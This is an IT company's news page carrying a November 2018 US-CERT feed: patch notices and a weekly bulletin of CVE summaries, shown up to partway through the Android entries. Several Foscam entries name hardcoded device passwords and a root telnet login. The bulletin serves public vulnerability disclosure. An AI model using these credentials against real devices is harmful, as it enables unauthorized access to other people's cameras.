index_ label1 index_ label1
Providing services for federal, state and local government ...
index_ label2 index_ label2
Our commercial entity operations, providing enterprise services ...
index_ label3 index_ label3
How do we prepare for what's to come next? See inside ...
I.T. News
We are constantly interested in the latest and up-to-date technology.
As we move forward with the software development we will continue to use new technologies to improve our products and the customer experience. And we will continue to develop our solutions with both new functionality and increasing integration with the latest major platforms.

As the growing market shares and interests in the I.T. virtualization, we tailored the unique virtualization solution vFleXtor using proven, modern up-to-date technology.

Timely information about security topics and threats:

US-CERT: The United States Computer Emergency Readiness Team
  • Original release date: November 13, 2018

    Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review Microsoft?s November 2018 Security Update Summary and Deployment Information and apply the necessary updates.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 13, 2018

    Adobe has released security updates to address vulnerabilities in Flash Player, Adobe Acrobat and Reader, and Adobe Photoshop CC. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

    NCCIC encourages users and administrators to review Adobe Security Bulletins APSB18-39, APSB18-40, and APSB18-43 and apply the necessary updates.

     


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 12, 2018

    The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

    The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

    • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

    • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

    • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

    Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

    The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

     

    High Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no high vulnerabilities recorded this week.
    Back to top

     

    Medium Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no medium vulnerabilities recorded this week.
    Back to top

     

    Low Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no low vulnerabilities recorded this week.
    Back to top

     

    Severity Not Yet Assigned

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    apache -- hiveIn Apache Hive 2.3.3, 3.1.0 and earlier, local resources on HiveServer2 machines are not properly protected against malicious user if ranger, sentry or sql standard authorizer is not in use.2018-11-08not yet calculatedCVE-2018-11777
    MISC
    apache -- hiveIn Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics.2018-11-08not yet calculatedCVE-2018-1314
    MISC
    apache -- syncopeAn administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.2018-11-06not yet calculatedCVE-2018-17186
    MISC
    apache-- supersetVersions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.2018-11-07not yet calculatedCVE-2018-8021
    MISC
    atlassian -- sourcetree_for_macosThere was an argument injection vulnerability in Sourcetree for macOS from version 1.0b2 before version 3.0.0 via Git subrepositories in Mercurial repositories. An attacker with permission to commit to a Mercurial repository linked in Sourcetree for macOS is able to exploit this issue to gain code execution on the system.2018-11-05not yet calculatedCVE-2018-13396
    CONFIRM
    atlassian -- sourcetree_for_windowsThere was an argument injection vulnerability in Sourcetree for Windows from version 0.5.1.0 before version 3.0.0 via Git subrepositories in Mercurial repositories. An attacker with permission to commit to a Mercurial repository linked in Sourcetree for Windows is able to exploit this issue to gain code execution on the system.2018-11-05not yet calculatedCVE-2018-13397
    CONFIRM
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification blindly trusts the declared lengths in the ASN.1 structure. Consequently, when small public exponents are being used, a remote attacker can generate purposefully crafted signatures (and put them on X.509 certificates) to induce illegal memory access and crash the verifier.2018-11-07not yet calculatedCVE-2018-16149
    CONFIRM
    MLIST
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification does not reject excess data after the hash value. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation through fake X.509 certificates. This is a variant of CVE-2006-4340.2018-11-07not yet calculatedCVE-2018-16150
    CONFIRM
    MLIST
    axtls -- axtlsIn sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification does not properly verify the ASN.1 metadata. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation through fake X.509 certificates. This is an even more permissive variant of CVE-2006-4790 and CVE-2014-1568.2018-11-07not yet calculatedCVE-2018-16253
    CONFIRM
    MLIST
    bagesoft/bagecms -- bagesoft/bagecmsIn BageCMS 3.1.3, upload/index.php has a CSRF vulnerability that can be used to upload arbitrary files and get server privileges.2018-11-08not yet calculatedCVE-2018-19104
    MISC
    basercms -- basercmsAn issue was discovered in baserCMS before 4.1.4. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the data[UploaderCategory][name] parameter to an admin/uploader/uploader_categories/edit URI.2018-11-05not yet calculatedCVE-2018-18943
    MISC
    MISC
    basercms -- basercmsIn baserCMS before 4.1.4, lib\Baser\Model\ThemeConfig.php allows remote attackers to execute arbitrary PHP code via the admin/theme_configs/form data[ThemeConfig][logo] parameter.2018-11-05not yet calculatedCVE-2018-18942
    MISC
    MISC
    MISC
    brocade_communication_systems -- fabricA Vulnerability in the help command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6437
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the firmwaredownload command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6436
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the supportsave command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access.2018-11-08not yet calculatedCVE-2018-6438
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the Brocade Webtools firmware update section of Brocade Fabric OS before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow remote authenticated attackers to execute arbitrary commands.2018-11-08not yet calculatedCVE-2018-6442
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in Secure Shell implementation of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to provide arbitrary environment variables, and bypass the restricted configuration shell.2018-11-08not yet calculatedCVE-2018-6441
    CONFIRM
    brocade_communication_systems -- fabricA Vulnerability in the secryptocfg command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, and gain root access.2018-11-08not yet calculatedCVE-2018-6435
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the secryptocfg export command of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to bypass the export file access restrictions and initiate a file copy from the source to a remote system.2018-11-08not yet calculatedCVE-2018-6433
    CONFIRM
    brocade_communication_systems -- fabricA vulnerability in the web management interface of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow attackers to intercept or manipulate a user's session ID.2018-11-08not yet calculatedCVE-2018-6434
    CONFIRM
    circontrol -- circarlifeCircontrol CirCarLife all versions prior to 4.3.1, authentication to the device can be bypassed by entering the URL of a specific page.2018-11-02not yet calculatedCVE-2018-17918
    BID
    MISC
    circontrol -- circarlifeCircontrol CirCarLife all versions prior to 4.3.1, the PAP credentials of the device are stored in clear text in a log file that is accessible without authentication.2018-11-02not yet calculatedCVE-2018-17922
    BID
    MISC
    cisco -- content_security_management_applianceA vulnerability in the web-based management interface of Cisco Content Security Management Appliance (SMA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.2018-11-08not yet calculatedCVE-2018-15393
    BID
    CISCO
    cisco -- energy_management_suite_softwareA vulnerability in the web-based management interface of Cisco Energy Management Suite Software could allow an authenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.2018-11-08not yet calculatedCVE-2018-15445
    BID
    CISCO
    MISC
    cisco -- energy_management_suite_softwareA vulnerability in the web-based user interface of Cisco Energy Management Suite Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by convincing a user of an affected system to import a crafted XML file with malicious entries, which could allow the attacker to read and write files within the affected application.2018-11-08not yet calculatedCVE-2018-15444
    BID
    CISCO
    MISC
    cisco -- firepower_system_softwareA vulnerability in the detection engine of Cisco Firepower System Software could allow an unauthenticated, remote attacker to bypass a configured Intrusion Prevention System (IPS) rule that inspects certain types of TCP traffic. The vulnerability is due to incorrect TCP retransmission handling. An attacker could exploit this vulnerability by sending a crafted TCP connection request through an affected device. A successful exploit could allow the attacker to bypass configured IPS rules and allow uninspected traffic onto the network.2018-11-08not yet calculatedCVE-2018-15443
    BID
    CISCO
    cisco -- immunet_and_advanced_malware_protection_for_endpointsA vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. This could allow executable files to be launched on the system without being analyzed for threats. The vulnerability is due to improper process resource handling. An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or Cisco AMP for Endpoints and executing a malicious file. A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from being protected from further intrusion.2018-11-08not yet calculatedCVE-2018-15437
    BID
    CISCO
    cisco -- integrated_management_controller_supervisorA vulnerability in the web framework code of Cisco Integrated Management Controller (IMC) Supervisor could allow an unauthenticated, remote attacker to execute arbitrary SQL queries. The vulnerability is due to a lack of proper validation of user-supplied input in SQL queries. An attacker could exploit this vulnerability by sending crafted URLs that contain malicious SQL statements to the affected application.2018-11-08not yet calculatedCVE-2018-15447
    BID
    CISCO
    cisco -- meeting_serverA vulnerability in Cisco Meeting Server could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper protections on data that is returned from user meeting requests when the Guest access via ID and passcode option is set to Legacy mode. An attacker could exploit this vulnerability by sending meeting requests to an affected system. A successful exploit could allow the attacker to determine the values of meeting room unique identifiers, possibly allowing the attacker to conduct further exploits.2018-11-08not yet calculatedCVE-2018-15446
    BID
    CISCO
    cisco -- meraki_product_linesA vulnerability in the local status page functionality of the Cisco Meraki MR, MS, MX, Z1, and Z3 product lines could allow an authenticated, remote attacker to modify device configuration files. The vulnerability occurs when handling requests to the local status page. An exploit could allow the attacker to establish an interactive session to the device with elevated privileges. The attacker could then use the elevated privileges to further compromise the device or obtain additional configuration data from the device that is being exploited.2018-11-08not yet calculatedCVE-2018-0284
    CISCO
    cisco -- prime_collaboration_assuranceA vulnerability in the web-based UI of Cisco Prime Collaboration Assurance could allow an authenticated, remote attacker to overwrite files on the file system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a specific UI input field to provide a custom path location. A successful exploit could allow the attacker to overwrite files on the file system.2018-11-08not yet calculatedCVE-2018-15450
    BID
    CISCO
    cisco -- prime_service_catalogA vulnerability in the web-based management interface of Cisco Prime Service Catalog could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information.2018-11-08not yet calculatedCVE-2018-15451
    BID
    CISCO
    cisco -- registered_envelope_serviceA vulnerability in the user management functions of Cisco Registered Envelope Service could allow an unauthenticated, remote attacker to discover sensitive user information. The attacker could use this information to conduct additional reconnaissance attacks. The vulnerability is due to an insecure configuration that allows improper indexing. An attacker could exploit this vulnerability by using a search engine to look for specific data strings. A successful exploit could allow the attacker to discover certain sensitive information about the application, including usernames.2018-11-08not yet calculatedCVE-2018-15448
    BID
    CISCO
    cisco -- small_business_switchesA vulnerability in the Cisco Small Business Switches software could allow an unauthenticated, remote attacker to bypass the user authentication mechanism of an affected device. The vulnerability exists because under specific circumstances, the affected software enables a privileged user account without notifying administrators of the system. An attacker could exploit this vulnerability by using this account to log in to an affected device and execute commands with full admin rights. Cisco has not released software updates that address this vulnerability. This advisory will be updated with fixed software information once fixed software becomes available. There is a workaround to address this vulnerability.2018-11-08not yet calculatedCVE-2018-15439
    CISCO
    cisco -- stealthwatch_management_consoleA vulnerability in the Stealthwatch Management Console (SMC) of Cisco Stealthwatch Enterprise could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected system. The vulnerability is due to an insecure system configuration. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. An exploit could allow the attacker to gain unauthenticated access, resulting in elevated privileges in the SMC.2018-11-08not yet calculatedCVE-2018-15394
    BID
    CISCO
    cisco -- unity_expressA Java deserialization vulnerability in Cisco Unity Express (CUE) could allow an unauthenticated, remote attacker to execute arbitrary shell commands with the privileges of the root user. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to the listening Java Remote Method Invocation (RMI) service. A successful exploit could allow the attacker to execute arbitrary commands on the device with root privileges.2018-11-08not yet calculatedCVE-2018-15381
    CISCO
    cisco -- video_surveillance_media_serverA vulnerability in the web-based management interface of Cisco Video Surveillance Media Server could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the web-based management interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to cause the web-based management interface to become unreachable, resulting in a DoS condition.2018-11-08not yet calculatedCVE-2018-15449
    BID
    CISCO
    clippercms -- clippercmsClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload (enabled by default). This can be used by an attacker to perform actions for an admin (or any user with the file upload capability). With this vulnerability, one can automatically upload files (by default, it allows html, pdf, xml, zip, and many other file types). A file can be accessed publicly under the "/assets/files" directory.2018-11-10not yet calculatedCVE-2018-19135
    MISC
    cloud_foundry -- bits-service_releaseCloud Foundry Bits-Service Release, versions prior to 2.14.0, uses an insecure hashing algorithm to sign URLs. A remote malicious user may obtain a signed URL and extract the signing key, allowing them complete read and write access to the the Bits Service storage.2018-11-09not yet calculatedCVE-2018-15796
    CONFIRM
    dedecms -- dedecmsDedeCMS 5.7 SP2 has SQL Injection via the dede\co_do.php ids parameter.2018-11-07not yet calculatedCVE-2018-19061
    MISC
    MISC
    degrau_publicidade_e_internet_plataforma_de_e-commerce -- busca.aspx.csBusca.aspx.cs in Degrau Publicidade e Internet Plataforma de E-commerce allows SQL Injection via the busca/ URI.2018-11-06not yet calculatedCVE-2018-18963
    MISC
    domainmod -- domainmodDomainMOD through 4.11.01 has XSS via the assets/edit/registrar-account.php raid parameter.2018-11-09not yet calculatedCVE-2018-19136
    MISC
    domainmod -- domainmodDomainMOD through 4.11.01 has XSS via the assets/edit/ip-address.php ipid parameter.2018-11-09not yet calculatedCVE-2018-19137
    MISC
    exiv2 -- exiv2In Exiv2 0.26, Exiv2::PsdImage::readMetadata in psdimage.cpp in the PSD image reader may suffer from a denial of service (infinite loop) caused by an integer overflow via a crafted PSD image file.2018-11-08not yet calculatedCVE-2018-19108
    MISC
    MISC
    exiv2 -- exiv2
     
    In Exiv2 0.26, Exiv2::IptcParser::decode in iptc.cpp (called from psdimage.cpp in the PSD image reader) may suffer from a denial of service (heap-based buffer over-read) caused by an integer overflow via a crafted PSD image file.2018-11-08not yet calculatedCVE-2018-19107
    MISC
    MISC
    flarum -- flarum_coreIn Flarum Core 0.1.0-beta.7.1, a serious leak can get everyone's email address.2018-11-09not yet calculatedCVE-2018-19133
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The exported device configuration is encrypted with the hardcoded Pxift* password in some cases.2018-11-07not yet calculatedCVE-2018-19066
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. They allow remote attackers to execute arbitrary OS commands via shell metacharacters in the usrName parameter of a CGIProxy.fcgi addAccount action.2018-11-07not yet calculatedCVE-2018-19070
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. /mnt/mtd/boot.sh has 0777 permissions, allowing local users to control the commands executed at system start-up.2018-11-07not yet calculatedCVE-2018-19071
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The exported device configuration is encrypted with the hardcoded BpP+2R9*Q password in some cases.2018-11-07not yet calculatedCVE-2018-19065
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The CGIProxy.fcgi?cmd=setTelnetSwitch feature is authorized for the root user with a password of toor.2018-11-07not yet calculatedCVE-2018-19069
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The admin account has a blank password.2018-11-07not yet calculatedCVE-2018-19063
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The firewall has no effect except for blocking port 443 and partially blocking port 88.2018-11-07not yet calculatedCVE-2018-19074
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. There is a hardcoded Ak47@99 password for the factory~ account.2018-11-07not yet calculatedCVE-2018-19067
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. /mnt/mtd/app has 0777 permissions, allowing local users to replace an archive file (within that directory) to control what is extracted to RAM at boot time.2018-11-07not yet calculatedCVE-2018-19072
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The FTP and RTSP services make it easier for attackers to conduct brute-force authentication attacks, because failed-authentication limits apply only to HTTP (not FTP or RTSP).2018-11-07not yet calculatedCVE-2018-19076
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ftpuser1 account has a blank password, which cannot be changed.2018-11-07not yet calculatedCVE-2018-19064
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The firewall feature makes it easier for remote attackers to ascertain credentials and firewall rules because invalid credentials lead to error -2, whereas rule-based blocking leads to error -8.2018-11-07not yet calculatedCVE-2018-19075
    MISC
    foscam -- c2_and_opticam_i5_devicesAn issue was discovered on Foscam C2 devices with System Firmware 1.11.1.8 and Application Firmware 2.72.1.32, and Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. They allow attackers to execute arbitrary OS commands via shell metacharacters in the modelName, by leveraging /mnt/mtd/app/config/ProductConfig.xml write access.2018-11-07not yet calculatedCVE-2018-19073
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetDNS method allows remote attackers to conduct stack-based buffer overflow attacks via the IPv4Address field.2018-11-07not yet calculatedCVE-2018-19082
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetHostname method allows unauthenticated persistent XSS.2018-11-07not yet calculatedCVE-2018-19080
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The CGIProxy.fcgi?cmd=setTelnetSwitch feature is authorized for hidden factory credentials.2018-11-07not yet calculatedCVE-2018-19068
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The response to an ONVIF media GetStreamUri request contains the administrator username and password.2018-11-07not yet calculatedCVE-2018-19078
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SystemReboot method allows unauthenticated reboot.2018-11-07not yet calculatedCVE-2018-19079
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. The ONVIF devicemgmt SetDNS method allows remote attackers to execute arbitrary OS commands via the IPv4Address field.2018-11-07not yet calculatedCVE-2018-19081
    MISC
    foscam -- opticam_i5_devicesAn issue was discovered on Foscam Opticam i5 devices with System Firmware 1.5.2.11 and Application Firmware 2.21.1.128. RtspServer allows remote attackers to cause a denial of service (daemon hang or restart) via a negative integer in the RTSP Content-Length header.2018-11-07not yet calculatedCVE-2018-19077
    MISC
    foxit_software -- foxit_readerThe u3d plugin 9.3.0.10809 (aka plugins\U3DBrowser.fpi) in FoxitReader.exe in Foxit Reader 9.3.0.10826 allows remote attackers to cause a denial of service (out-of-bounds read) or obtain sensitive information via a U3D sample.2018-11-05not yet calculatedCVE-2018-18933
    MISC
    MISC
    fruitywifi -- fruitywifiShell Metacharacter Injection in www/modules/save.php in FruityWifi (aka PatatasFritas/PatataWifi) through 2.4 allows remote attackers to execute arbitrary code with root privileges via a crafted mod_name parameter in a POST request. NOTE: unlike in CVE-2018-17317, the attacker does not need a valid session.2018-11-10not yet calculatedCVE-2018-19168
    MISC
    gitea -- giteaGitea before 1.5.4 allows remote code execution because it does not properly validate session IDs. This is related to session ID handling in the go-macaron/session code for Macaron.2018-11-04not yet calculatedCVE-2018-18926
    MISC
    gogs -- gogsGogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.2018-11-04not yet calculatedCVE-2018-18925
    MISC
    google -- androidIn the SELinux permissions of crash_dump.te, there is a permissions bypass due to a missing restriction. This could lead to a local escalation of privilege, with System privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android-9.0 Android ID: A-110107376.2018-11-06not yet calculatedCVE-2018-9488
    CONFIRM
    EXPLOIT-DB
    google -- androidIn CopyToOMX of OMXNodeInstance.cpp there is a possible out-of-bounds write due to an incorrect bounds check. This could lead to remote arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-77486542.2018-11-06not yet calculatedCVE-2018-9427
    SECTRACK
    CONFIRM
    google -- androidIn get_futex_key of futex.c, there is a use-after-free due to improper locking. This could lead to local escalation of privilege with no additional privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-74250718 References: Upstream kernel.2018-11-06not yet calculatedCVE-2018-9422
    MLIST
    MLIST
    CONFIRM
    google -- androidIn driver_override_store and driver_override_show of bus.c, there is a possible double free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-69129004 References: Upstream kernel.2018-11-06not yet calculatedCVE-2018-9415
    CONFIRM
    UBUNTU
    UBUNTU
    UBUNTU
    google -- androidIn driver_override_store of bus.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-74128061 References: Upstream kernel.2018-11-06not yet calculatedCVE-2018-9385
    CONFIRM
    google -- androidIn processMessagePart of InboundSmsHandler.java, there is a possible remote denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-72298611.2018-11-06not yet calculatedCVE-2018-9362
    BID
    CONFIRM
    google -- androidIn getstring of ID3.cpp there is a possible out-of-bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78656554.2018-11-06not yet calculatedCVE-2018-9437
    SECTRACK
    CONFIRM
    google -- androidIn BNEP_Write of bnep_api.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74947856.2018-11-06not yet calculatedCVE-2018-9357
    BID
    CONFIRM
    google -- androidIn the hidp_process_report in bluetooth, there is an integer overflow. This could lead to an out of bounds write with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-65853588 References: Upstream kernel.2018-11-06not yet calculatedCVE-2018-9363
    REDHAT
    MLIST
    CONFIRM
    UBUNTU
    UBUNTU
    DEBIAN
    google -- androidIn gatts_process_attribute_req of gatt_sc.cc, there is a possible read of uninitialized data due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-73172115.2018-11-06not yet calculatedCVE-2018-9358
    BID
    CONFIRM
    google -- androidIn readMetadata of Utils.cpp, there is a possible path traversal bug due to a confused deputy. This could lead to local escalation of privilege when mounting a USB device with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-80436257.2018-11-06not yet calculatedCVE-2018-9445
    SECTRACK
    CONFIRM
    EXPLOIT-DB
    google -- androidIn bnep_data_ind of bnep_main.c, there is a possible remote code execution due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74950468.2018-11-06not yet calculatedCVE-2018-9356
    BID
    CONFIRM
